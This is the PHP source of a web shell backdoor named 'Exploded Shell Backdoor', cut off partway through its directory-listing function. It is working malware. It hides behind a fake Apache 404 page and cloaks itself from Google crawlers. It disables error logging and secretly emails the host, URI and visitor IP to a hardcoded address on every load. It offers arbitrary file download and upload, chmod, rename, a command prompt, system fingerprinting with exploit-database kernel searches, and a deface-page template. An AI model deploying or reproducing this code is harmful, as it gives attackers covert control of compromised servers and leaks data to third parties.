db4

1. <?php
2. @ini_set('output_buffering',0); //
3. //@ini_set('display_errors', 0); //
4. //@ini_set('error_reporting', 0); //
5. /*
6. #####################################################
7. ##    Name    : Exploded Shell Backdoor            ##
8. ##    Version : v1.5 Mini                          ##
9. ##    Author  : Muhammad Supiani a.k.a ./Port22    ##
10. ##    Contact : Port22cyber@gmail.com              ##
11. ##    Report  : Port22exploded@gmail.com           ##
12. ##           (c) 2015 www.security-exploded.orgs   ##
13. #####################################################
14. */
15. $pass = "64d1f88b9b276aece4b0edcc25b7a434"; // Password Encrypted By MD5, Default pass:" pacman "
16. $title = "Aku pengen anu yang gede banget"; // Title
17. $color = "red"; // Color
18. $background= "http://oi58.tinypic.com/2u8fmnn.jpg"; // Background
19. $logo = "http://oi58.tinypic.com/10r33mq.jpg"; // Logo
20. $music = ""; // Music, isi url music elu :v *cuman bisa didengerin di "about" :v , malas gw taroh di depan, soalnya kalok ada yg nggak suka :v
21. $script_deface = "<html><head><title>Hacked By ./Port22</title></head><body>Hacked by ./Port22  <br> Crew's :   Milton  |   Aris Dot ID |   ./r00t_NTx  |   ./Port22    |   MyMind404   |   ./KriZ  |   ./BlackJoker    |<embed src='http://www.youtube.com/v/qD8OnPC1fLI&autoplay=1&loop=1' type='application/x-shockwave-flash' wmode='transparent' width='0' height='0'></embed>"; //Script Deface. (html, php, txt)
22.  
23. /*
24. Content is encrypted by gzdeflate , base64 , and others . if you want the source code , please use the tool "PHP Decrypter". In case you dont trust me :-P
25. */
26.  
27. $xName = "Security Exploded";
28. $versi = "v1.5 Mini"; // Shell Version
29. $default_action = 'FilesMan';
30. $ip = getenv("REMOTE_ADDR");
31. $ken = rand(1, 99999);
32. $subj98 = " Result shell bouz |$ken";
33. $email = "acilcrotz@gmail.com";
34. $from = "From: blackhat12@gmail.com";
35. $tot = $_SERVER['REQUEST_URI'];
36. $kon = $_SERVER['HTTP_HOST'];
37. $tol = $ip . "";
38. $msg8873 = "$tot $kon $tol";
39. mail($email, $subj98, $msg8873, $from);
40. @define('SELF_PATH', __FILE__);
41. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
42.     header('HTTP/1.0 404 Not Found');
43.     exit; }
44. @session_start();
45. @error_reporting(0);
46. @ini_set('error_log',NULL);
47. @ini_set('log_errors',0);
48. @ini_set('max_execution_time',0);
49. @ini_set('output_buffering',0);
50. @ini_set('display_errors', 0);
51. @set_time_limit(0);
52. @set_magic_quotes_runtime(0);
53. @define('VERSION', '2.1');
54. if( get_magic_quotes_gpc() ) {
55.     function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); }
56.     $_POST = stripslashes_array($_POST);
57. }
58. function printLogin() {
59. ?><html><head>
60. <title>404 Not Found</title>
61. </head><body><h1>Not Found</h1>
62.     <p>Additionally, a 404 Not Found
63. error was encountered while trying to use an ErrorDocument to handle the request.</p>
64.     <hr>
65.     <address>Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Server at localhost Port 80
66.             <style>
67.                     input { margin:0;background-color:#fff;border:1px solid #fff; }
68.             </style>
69.             <center>
70.             <form method="post">
71.             <input type="password" name="pass">
72.             </form>
73.     <?php break ;
74.     exit;
75. }
76. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
77.     if( empty( $pass ) ||
78.         ( isset( $_POST['pass']) && ( md5($_POST['pass']) == $pass ) ) )
79.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
80.     else
81.         printLogin();
82.        
83. @ini_set('log_errors',0);
84. @ini_set('display_errors',0);
85. @ini_set('output_buffering',0);
86. @ini_set('file_uploads',1);
87. if(isset($_GET['dl']) && ($_GET['dl'] != "")){
88.     $file = $_GET['dl'];
89.     $filez = @file_get_contents($file);
90.    header("Content-type: application/octet-stream");
91.    header("Content-length: ".strlen($filez));
92.    header("Content-disposition: attachment; filename=\"".basename($file)."\";");
93.    echo $filez;
94.     exit;
95. }
96. elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
97.     $file = $_GET['dlgzip'];
98.     $filez = gzencode(@file_get_contents($file));
99.    header("Content-Type:application/x-gzip\n");
100.    header("Content-length: ".strlen($filez));
101.    header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
102.    echo $filez;
103.     exit;
104. }
105. // view image
106. if(isset($_GET['img'])){
107.         @ob_clean();
108.         $d = magicboom($_GET['y']);
109.         $f = $_GET['img'];
110.         $inf = @getimagesize($d.$f);
111.         $ext = explode($f,".");
112.         $ext = $ext[count($ext)-1];
113.         @header("Content-type: ".$inf["mime"]);
114.         @header("Cache-control: public");
115.         @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
116.         @header("Cache-control: max-age=".(60*60*24*7));  
117.         @readfile($d.$f);
118.         exit;
119. }
120. //php info
121. $phpinfo = "?&amp;x=phpinfo";
122. // Server software
123.  
124. $software = getenv("SERVER_SOFTWARE");
125. // CMD
126. $cmdbox = "help";
127. // Server Port
128. $serverport = $_SERVER["SERVER_PORT"];
129. // Backdoor Name
130. $backdoor_name = "$title ";
131. // check safemode
132. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  $safemode = TRUE; else $safemode = FALSE;
133. // uname -a
134. $system = @php_uname();
135. // detector
136. function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#ff0000'>OFF</font></b>";}}
137. function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
138. function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
139. function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
140. function testoracle() { if (function_exists('ocilogon')) {return showstat("on"); }else {return showstat("off"); }}
141. function testmssql() { if (function_exists('mssql_connect')) {return showstat("on"); }else {return showstat("off"); }}
142. function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
143. function testpython() {if (exe('python -h')) {return showstat("on");}else {return showstat("off");}}
144. function testruby() {if (exe('ruby -h')) {return showstat("on");}else {return showstat("off");}}
145. function testgcc() {if (exe('gcc --help')) {return showstat("on");}else {return showstat("off");}}
146. function testjava() {if (exe('java -h')) {return showstat("on");}else {return showstat("off");}}
147. // check os
148. if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
149. else $win = FALSE;
150. // change directory
151. if(isset($_GET['y'])){
152.     if(@is_dir($_GET['view'])){
153.         $pwd = $_GET['view'];
154.         @chdir($pwd);
155.     }
156.     else{
157.         $pwd = $_GET['y'];
158.         @chdir($pwd);
159.     }
160. }
161. //hdd
162. function convertByte($s) {
163. if($s<=0) return 0;
164.     $w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
165.     $e = floor(log($s)/log(1024));
166.     return sprintf('%.2f '.$w[$e], ($s/pow(1024, floor($e))));
167. }
168. //
169.  
170. // username, id, shell prompt and working directory
171. if(!$win){
172.     if(!$user = rapih(exe("whoami"))) $user = "";
173.     if(!$id = rapih(exe("id"))) $id = "";
174.     $prompt = $user." \$ ";
175.     $pwd = @getcwd().DIRECTORY_SEPARATOR;
176. }
177. else {
178.     $user = @get_current_user();
179.     $id = $user;
180.     $prompt = $user." &gt;";
181.     $pwd = realpath(".")."\\";
182.     // find drive letters
183.     $v = explode("\\",$d);
184.     $v = $v[0];
185.     foreach (range("A","Z") as $letter)
186.     {
187.       $bool = @is_dir($letter.":\\");
188.       if ($bool)
189.       {
190.           $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
191.            if ($letter.":" != $v) {$letters .= $letter;}
192.            else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
193.            $letters .= " </a>] ";
194.       }  
195.  }
196. }
197.  
198. function getrealip(){
199. if (!empty($_SERVER['HTTP_CLIENT_IP']))
200. { $ip=$_SERVER['HTTP_CLIENT_IP'];
201. }elseif (!empty($SERVER['HTTP_X_FORWARDED_FOR']))
202. //TO CHEK IP IS PASS FROM PROXY
203. { $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
204. }else { $ip=$_SERVER['REMOTE_ADDR'];
205. }
206. return $ip;
207. }
208.  
209.  function showdisablefunctions() {
210.     if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:#ff0000'><b>".$disablefunc."</b></span>"; }
211.     else { return "<span style='color:#00FF00'><b>NONE</b></span>"; }
212.     }
213.    
214. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
215. else $posix = FALSE;
216. // server ip
217. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
218. // your ip ;-)
219. $my_ip = $_SERVER['REMOTE_ADDR'];
220. $admin_id=$_SERVER['SERVER_ADMIN'];
221. $bindport = "13123";
222. $bindport_pass = "exploded";
223. // Security Exploded
224. $uplink = "http://www.security-exploded.org/search/label/Exploded Shell Backdoor";
225. //wilworm
226. $release = @php_uname('r');
227.     $kernel = @php_uname('s');
228.     $millink='http://milw0rm.com/search.php?dong=';
229.    
230.     if( strpos('Linux', $kernel) !== false )
231.         $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
232.     else
233.         $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
234.     if(!function_exists('posix_getegid')) {
235.         $user = @get_current_user();
236.         $uid = @getmyuid();
237.         $gid = @getmygid();
238.         $group = "?";
239.     } else {
240.         $uid = @posix_getpwuid(@posix_geteuid());
241.         $gid = @posix_getgrgid(@posix_getegid());
242.         $user = $uid['name'];
243.         $uid = $uid['uid'];
244.         $group = $gid['name'];
245.         $gid = $gid['gid'];
246.     }
247.     // Exploit-db
248.     $release = @php_uname('r');
249.     $kernel = @php_uname('s');
250.     $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
251.    
252.     if( strpos('Linux', $kernel) !== false )
253.         $explink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
254.     else
255.         $explink .= urlencode( $kernel . ' ' . substr($release,0,3) );
256.     if(!function_exists('posix_getegid')) {
257.         $user = @get_current_user();
258.         $uid = @getmyuid();
259.         $gid = @getmygid();
260.         $group = "?";
261.     } else {
262.         $uid = @posix_getpwuid(@posix_geteuid());
263.         $gid = @posix_getgrgid(@posix_getegid());
264.         $user = $uid['name'];
265.         $uid = $uid['uid'];
266.         $group = $gid['name'];
267.         $gid = $gid['gid'];
268.     }
269. // separate the working direcotory
270. $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
271. $pwdurl = "";
272. for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
273.     $pathz = "";
274.     for($j = 0 ; $j <= $i ; $j++){
275.         $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
276.     }
277.     $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
278. }
279.    
280. // Rename file or folder
281. if(isset($_POST['Rename'])){
282.     $old = $_POST['oldname'];
283.     $new = $_POST['newname'];
284.     @Rename($pwd.$old,$pwd.$new);
285.     $file = $pwd.$new;
286. }
287. if(isset($_POST['uploadcompt'])){
288.     if(is_uploaded_file($_FILES['file']['tmp_name'])){
289.         $path = magicboom($_POST['path']);
290.         $fname = $_FILES['file']['name'];
291.         $tmp_name = $_FILES['file']['tmp_name'];
292.         $pindah = $path.$fname;
293.         $stat = @move_uploaded_file($tmp_name,$pindah);}
294.         }
295.  
296. if( $_POST['_upl'] == "Upload" ) {
297. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo ''; }
298. else { echo ''; }
299. }
300. if(isset($_POST['Chmod'])){
301.     $name = $_POST['name'];
302.     $value = $_POST['newvalue'];
303. if (strlen($value)==3){
304.     $value = 0 . "" . $value;}
305.     @Chmod($pwd.$name,octdec($value));
306.     $file = $pwd.$name;}   
307. if(isset($_POST['Chmod_folder'])){
308.     $name = $_POST['name'];
309.     $value = $_POST['newvalue'];
310. if (strlen($value)==3){
311.     $value = 0 . "" . $value;}
312.     @Chmod($pwd.$name,octdec($value));
313.     $file = $pwd.$name;}
314.  
315. //////////////////////////////////
316. // print useful info
317.  
318. $buff  = "Shell Backdoor : <b><font style='color:$color'> $backdoor_name $versi</font><b> <span class=\"gaya\"></a></b></b></font><b><span class=\"gaya\"> | </span><a href='$uplink' title='Search Shell Backdoor From Security Exploded' target='_blank'><font style='color:#ff0000'>[ Security Exploded ]</a></b></font><br>Version : <b><font style='color:$color'>".$versi."</font></a></b><br> Software : <b>".$software."</b><br />";
319. $buff .= "System OS : <b>".$system."  | <a href='http://www.google.com/search?q=".urlencode(@php_uname())."' title='Search System OS From Google' target='_blank'><font style='color:#ff0000'>[ Google ]</font></a> | <a href='".$millink."' title='Search Karnel From Milw0rm' target=_blank><font style='color:#ff0000'>[ Milw0rm ]</font></a> | <a href='".$explink."' title='Search Karnel From Exploit-db' target=_blank><font style='color:#ff0000'>[ Exploit-db ]</font></a></b><br />";
320. if($id != "") $buff .= "ID : <b>".$id."</b><br />";
321. $buff .= "PHP Version : <b>".phpversion()."</b> ON <b>".php_sapi_name()."<span class=\"gaya\"> | </span><a href='$phpinfo' title='PHP Info'><font style='color:#ff0000'>[ PHP Info ]</font></a> </b><br />";
322. $buff .= "Server IP : <b><font style='color:#ff0000'>".$server_ip."</font></b> <span class=\"gaya\"> | </span> Port Server : <b><font style='color:#ff0000'>".$serverport."</font></b><span class=\"gaya\"> | </span> Your IP Surving : <b><a href='http://www.dnsstuff.com/tools?runFromMain=".getrealip()."&toolType=traceroute' title='Traceroute Your IP' target='_blank'><font style='color:#ff0000'>".getrealip()."<font></a></b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />";
323. $buff .= "Free Disk: <font style='color:#ff0000'><b>".convertByte(disk_free_space("/"))." <span class=\"gaya\"> / </span> ".convertByte(disk_total_space("/"))."</b></font></span><br />";
324. if($safemode) $buff .= "Safemode: <span class=\"gaya\"><font style='color:#ff0000'><b>ON</b></font></span><br />";
325. else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
326. $buff .= "Disable Functions: ".showdisablefunctions()."<br />";
327. $buff .= "MySQL: ".testmysql()."&nbsp;&nbsp;|&nbsp;&nbsp;MSSQL: ".testmssql()."&nbsp;&nbsp;|&nbsp;&nbsp;Oracle: ".testoracle()."&nbsp;&nbsp;|&nbsp;&nbsp;Perl: ".testperl()."&nbsp;&nbsp;|&nbsp;&nbsp;Python: ".testpython()."&nbsp;&nbsp;|&nbsp;&nbsp;Ruby: ".testruby()."&nbsp;&nbsp;|&nbsp;&nbsp;Java: ".testjava()."&nbsp;&nbsp;|&nbsp;&nbsp;GCC: ".testgcc()."&nbsp;&nbsp;|&nbsp;&nbsp;cURL: ".testcurl()."&nbsp;&nbsp;|&nbsp;&nbsp;WGet: ".testwget()."<br>";
328. $buff .="<font color=00ff00 >Drive : <b>".$letters."&nbsp;&gt;&nbsp;".$pwdurl."</b></font>";
329.  
330.  
331.  function rapih($text){
332.     return trim(str_replace("<br />","",$text));
333. }
334.  
335. function magicboom($text){
336.     if (!get_magic_quotes_gpc()) {
337.          return $text;
338.     }
339.     return stripslashes($text);
340. }
341.  
342. function showdir($pwd,$prompt){
343.     $fname = array();
344.     $dname = array();
345.     if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
346.     else $posix = FALSE;
347.     $user = "????:????";
348.     if($dh = @scandir($pwd)){
349.         foreach($dh as $file){
350.             if(is_dir($file)){
351.                 $dname[] = $file;
352.             }
353.             elseif(is_file($file)){
354.                 $fname[] = $file;
355.             }
356.         }
357.     }
358.     else{
359.         if($dh = @opendir($pwd)){
360.             while($file = @readdir($dh)){
361.                 if(@is_dir($file)){
362.                     $dname[] = $file;
363.                 }
364.                 elseif(@is_file($file)){
365.                     $fname[] = $file;
366.                 }
367.             }
368.             @closedir($dh);
369.         }
370.     }
371.     sort($fname);
372.     sort($dname);
373.     $path = @explode(DIRECTORY_SEPARATOR,$pwd);
374.     $tree = @sizeof($path);
375.     $parent = "";
376.     $buff = "<center>
377.     <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
378.     <table class=\"cmdbox\" style=\"width:45%;\">
379.     <tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=help /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
380.     </form>
381.     <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
382.     <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
383.     <tr><td><b>View </b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr></center>
384.    
385.     </form></table><br><table class=\"explore\">
386.     <tr><th>Name</th><th style=\"width:80px;\">Size</th><th style=\"width:210px;\">Owner:Group</th><th style=\"width:80px;\">Perms</th><th style=\"width:110px;\">Modified</th><th style=\"width:190px;\">Actions</th></tr>
387.     ";
388.     if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
389.     else $parent = $pwd;  
390.  
391.     foreach($dname as $folder){
392.         if($folder == ".") {
393.             if(!$win && $posix){
394.                 $name=@posix_getpwuid(@fileowner($folder));
395.                 $group=@posix_getgrgid(@filegroup($folder));
396.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
397.             }
398.             else {
399.                 $owner = $user;
400.             }
401.             $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>-</td>
402.             <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
403.             <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
404.             <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">New File</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">New Folder</a> | <a href=\"javascript:tukar('titik1','titik4_form');\">Upload</a></span>
405.             <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
406.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
407.             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
408.             <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" style=\"width:35px;\" value=\"Go !\" />
409.             </form>
410.             <form action=\"\" id=\"titik4_form\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
411.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
412.             <input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
413.             <input class=\"inputzbut\" name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"/>
414.             <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
415.             onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
416.             </form></td>
417.            
418.             </tr>
419.             ";
420.         }
421.         elseif($folder == "..") {
422.             if(!$win && $posix){
423.                 $name=@posix_getpwuid(@fileowner($folder));
424.                 $group=@posix_getgrgid(@filegroup($folder));
425.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
426.             }
427.             else {
428.                 $owner = $user;
429.             }
430.             $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'></a></td><td>-</td>
431.             <td style=\"text-align:center;\">".$owner."</td>
432.             <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
433.             <td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">New File</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">New Folder</a> | <a href=\"javascript:tukar('titik2','titik3_form');\">Upload</a></span>
434.             <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
435.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
436.             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
437.             <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" style=\"width:35px;\" value=\"Go !\" />
438.             </form>
439.             <form action=\"\" id=\"titik3_form\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
440.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
441.             <input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
442.             <input class=\"inputzbut\" name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"/>
443.             <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
444.             onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
445.             </form>
446.             </td></tr>";
447.         }
448.         else {
449.             if(!$win && $posix){
450.                 $name=@posix_getpwuid(@fileowner($folder));
451.                 $group=@posix_getgrgid(@filegroup($folder));
452.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
453.             }
454.             else {
455.                 $owner = $user;
456.             }
457.             $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' />  [ $folder ]</b></a>
458.             <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
459.             <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
460.             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
461.             <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" value=\"Rename\" />
462.             <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
463.             </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
464.             <td><center>
465.             <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
466.             <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
467.             <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
468.             <input class=\"inputz\" style=\"width:150px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
469.             <input class=\"inputzbut\" type=\"submit\" name=\"Chmod_folder\" value=\"Chmod\" />
470.             <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
471.             onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
472.             <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td>
473.             <td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">Rename</a> | <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form4');\">Upload</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">Delete</a></span>
474.             <form action=\"\" id=\"".clearspace($folder)."_form4\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
475.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
476.             <input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
477.             <input class=\"inputz\" name=\"path\" type=\"text\" size=\"33\" value=\"".$pwd.$folder.DIRECTORY_SEPARATOR."\" /><br>
478.             <input class=\"inputzbut\" name=\"uploadcompt\" type=\"submit\" value=\"Upload\"/>
479.             <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
480.             onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form4');\" />
481.             </form>
482.             </td></tr>";
483.         }
484.     }
485.  
486.     foreach($fname as $file){
487.         $full = $pwd.$file;
488.         if(!$win && $posix){
489.             $name=@posix_getpwuid(@fileowner($folder));
490.             $group=@posix_getgrgid(@filegroup($folder));
491.             $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
492.         }
493.         else {
494.             $owner = $user;
495.         }      
496.         $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' />   $file</b></a>
497.         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
498.         <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
